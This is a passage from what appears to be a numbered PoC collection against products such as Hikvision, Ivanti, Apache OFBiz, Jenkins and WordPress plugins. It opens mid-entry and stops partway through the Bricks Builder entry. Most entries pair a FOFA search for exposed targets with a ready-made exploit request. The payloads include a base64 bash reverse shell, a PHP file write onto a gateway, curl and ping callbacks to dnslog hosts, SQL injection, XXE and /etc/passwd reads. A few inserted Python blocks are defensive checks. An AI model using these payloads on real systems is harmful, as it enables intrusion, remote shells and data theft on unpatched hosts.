User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Legendsec (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload (the file name must match the one uploaded above):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file"; filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

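The SAMLRequest above is only dangerous because the endpoint hands attacker-controlled XML, DTD included, straight to its parser. Added example, not code from the original article or from Ivanti: a pre-parse gate a SAML SSO endpoint can apply to the SAMLRequest parameter. It base64-decodes the value (inflating HTTP-Redirect-binding payloads when they are not plain XML), rejects any document that declares a DOCTYPE or ENTITY, and only then parses. The function names and the benign AuthnRequest sample are constructed for this example.

```python
"""Pre-parse gate for a SAMLRequest parameter (added example, not vendor code).

A SAML AuthnRequest has no legitimate use for a DTD, so any DOCTYPE or ENTITY
declaration in the decoded document is grounds for rejection before an XML
parser ever sees it. That keeps the defence independent of parser settings.
"""
import base64
import binascii
import re
import zlib
import xml.etree.ElementTree as ET

# Matches "<!DOCTYPE" / "<!ENTITY" (any case, optional whitespace after "<!").
DTD_MARKER = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.I)

# Constructed benign request used to show the gate letting normal traffic through.
BENIGN_AUTHN_REQUEST = (
    '<?xml version="1.0"?>'
    '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    'ID="_constructed-example" Version="2.0" IssueInstant="2024-01-01T00:00:00Z">'
    '<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
    'https://sp.example</saml:Issuer>'
    '</samlp:AuthnRequest>'
)


def encode_saml_request(xml_text: str) -> str:
    """HTTP-POST binding: plain base64 of the XML, which is what the PoC sends."""
    return base64.b64encode(xml_text.encode("utf-8")).decode("ascii")


def decode_saml_request(b64: str) -> bytes:
    """Base64-decode strictly; inflate only when the result is not already XML
    (HTTP-Redirect binding wraps the XML in raw DEFLATE before base64)."""
    raw = base64.b64decode("".join(b64.split()), validate=True)
    if raw.lstrip().startswith(b"<"):
        return raw
    return zlib.decompress(raw, -15)


def saml_request_is_safe(b64: str) -> bool:
    """False for undecodable input and for any document declaring a DTD/entity."""
    try:
        doc = decode_saml_request(b64)
    except (binascii.Error, ValueError, zlib.error):
        return False
    return DTD_MARKER.search(doc) is None


def root_tag(b64: str) -> str:
    """Parse only after the gate has passed; returns the root element's tag."""
    if not saml_request_is_safe(b64):
        raise ValueError("SAMLRequest rejected: DTD or entity declaration present")
    return ET.fromstring(decode_saml_request(b64)).tag


if __name__ == "__main__":
    good = encode_saml_request(BENIGN_AUTHN_REQUEST)
    print("benign request accepted:", saml_request_is_safe(good), root_tag(good))
```

Run against the base64 from the PoC, decode_saml_request() yields the DOCTYPE with the external parameter entity and saml_request_is_safe() returns False; the constructed AuthnRequest passes and parses to the samlp:AuthnRequest root. The same gate is worth putting in front of every XML-accepting endpoint on the appliance, not just saml-sso.cgi.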
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response on the download side (lines of /etc/passwd come back inside the command's error message):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
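The byte string in the upload request above is the Jenkins CLI "plain" HTTP protocol. Added example, not code from the original article or from the Jenkins project: an encoder and decoder for those frames, written from the bytes shown in the PoC and from the opcode order in Jenkins' PlainCLIProtocol (ARG=0, LOCALE=1, ENCODING=2, START=3). Each frame is a 4-byte big-endian length of the data, one opcode byte, then the data; string-carrying opcodes use Java's writeUTF layout (2-byte length plus UTF-8 bytes). The decoder also pulls out every argument that begins with "@", which is the args4j file-expansion behaviour that turns the harmless "help" command into a read of /etc/passwd, and is the thing to alert on in captured CLI traffic.

```python
"""Jenkins CLI plain-protocol frame encoder/decoder (added example, not Jenkins code).

Frame layout, as read from the PoC bytes:
    4-byte big-endian length of DATA | 1-byte opcode | DATA
String arguments are Java writeUTF: 2-byte big-endian length + UTF-8 bytes.
Opcode numbers follow the PlainCLIProtocol.Op enum order: ARG, LOCALE, ENCODING, START.
"""
import struct

OP_ARG, OP_LOCALE, OP_ENCODING, OP_START = 0, 1, 2, 3
OP_NAMES = {OP_ARG: "ARG", OP_LOCALE: "LOCALE", OP_ENCODING: "ENCODING", OP_START: "START"}


def _java_utf(text: str) -> bytes:
    """Java DataOutputStream.writeUTF layout for plain ASCII/UTF-8 strings."""
    data = text.encode("utf-8")
    return struct.pack(">H", len(data)) + data


def frame(op: int, data: bytes = b"") -> bytes:
    """One frame; the length prefix counts DATA only, not the opcode byte."""
    return struct.pack(">I", len(data)) + bytes([op]) + data


def encode_cli_upload(args, encoding="GBK", locale="en_US") -> bytes:
    """Build the upload-side body a CLI client sends for the given argv."""
    body = b"".join(frame(OP_ARG, _java_utf(arg)) for arg in args)
    body += frame(OP_ENCODING, _java_utf(encoding))
    body += frame(OP_LOCALE, _java_utf(locale))
    body += frame(OP_START)
    return body


def decode_cli_upload(buf: bytes):
    """Split an upload body into (opcode name, string) pairs; raises on truncation."""
    frames, pos = [], 0
    while pos < len(buf):
        (length,) = struct.unpack_from(">I", buf, pos)
        op = buf[pos + 4]
        data = buf[pos + 5 : pos + 5 + length]
        if len(data) != length:
            raise ValueError("truncated frame at offset %d" % pos)
        pos += 5 + length
        text = ""
        if data:
            (slen,) = struct.unpack_from(">H", data, 0)
            text = data[2 : 2 + slen].decode("utf-8")
        frames.append((OP_NAMES.get(op, "OP%d" % op), text))
    return frames


def file_expansion_args(frames):
    """ARG values starting with '@': args4j replaces these with the named file's
    contents, which is the primitive behind the arbitrary read in the PoC."""
    return [text for name, text in frames if name == "ARG" and text.startswith("@")]


if __name__ == "__main__":
    body = encode_cli_upload(["help", "@/etc/passwd"])
    print(body)
    for name, text in decode_cli_upload(body):
        print(name, repr(text))
    print("file-expansion args:", file_expansion_args(decode_cli_upload(body)))
```

Encoding ["help", "@/etc/passwd"] reproduces the PoC body byte for byte (57 bytes, not the 163 the header claims, which is the length of the Python repr rather than of the raw bytes). Decoding it back shows two ARG frames, "help" and "@/etc/passwd", followed by ENCODING, LOCALE and START; any ARG that begins with "@" arriving at /cli on an unpatched instance is the indicator to alert on.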

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml" || icon_hash="1484947000" || icon_hash="1828756398" || icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

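This entry and the Hikvision download request at the top of this section use the same "..;/" trick. Added example, not code from the original article, Hikvision or Fortra: a Python model of why the trick works and what the hardened check looks like. Servlet containers strip ";param" path parameters from each URI segment and resolve ".." before dispatching, so a filter that allow-lists on the raw URI sees a public path while the container serves a protected one. The allow-list prefixes and the function names are assumptions for illustration, not either product's real rules.

```python
"""Why '/public/..;/protected' bypasses a raw-URI allow-list (added example).

container_normalize() approximates the servlet container's mapping; the two
checks below show the vulnerable pattern and a hardened one side by side.
"""
import posixpath
from urllib.parse import unquote

# Hypothetical allow-list (assumption): paths a filter admits without a session.
# Chosen to mirror the two PoCs; not the real products' rules.
PUBLIC_PREFIXES = ("/center/api/task/", "/goanywhere/images/")


def container_normalize(raw_uri: str) -> str:
    """Drop the query, strip ';param' from every segment, percent-decode,
    then resolve '.' and '..' the way the container does before dispatch.
    (Decoding after the split means %2F is treated as a literal slash, which
    Tomcat itself rejects by default; fine for a model of the path logic.)"""
    path = raw_uri.split("?", 1)[0]
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    path = unquote("/".join(segments))
    normalized = posixpath.normpath(path)
    if path.endswith("/") and not normalized.endswith("/"):
        normalized += "/"
    return normalized


def naive_is_public(raw_uri: str) -> bool:
    """Vulnerable pattern: prefix test against the raw request URI."""
    return raw_uri.startswith(PUBLIC_PREFIXES)


def hardened_is_public(raw_uri: str) -> bool:
    """Decide on the path the container will actually dispatch to, and refuse
    outright any URI carrying path parameters or traversal segments, which a
    public API never needs."""
    path = raw_uri.split("?", 1)[0]
    if ";" in path or ".." in unquote(path):
        return False
    return container_normalize(raw_uri).startswith(PUBLIC_PREFIXES)


if __name__ == "__main__":
    for uri in (
        "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../etc/passwd",
        "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml",
        "/center/api/task/list",
    ):
        print(uri)
        print("  dispatches to:", container_normalize(uri))
        print("  naive allows:", naive_is_public(uri), " hardened allows:", hardened_is_public(uri))
```

The raw-URI check passes both PoC requests because they start with an allow-listed prefix, while the container dispatches them to /center/api/orgManage/... and /goanywhere/wizard/.... The fix is to authorize on the normalized path, or to let the framework reject such URIs before any filter runs; Spring Security's StrictHttpFirewall, for example, refuses requests containing ";" or ".." by default.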
111. WordPress HTML5 Video Player plugin SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress NotificationX plugin SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
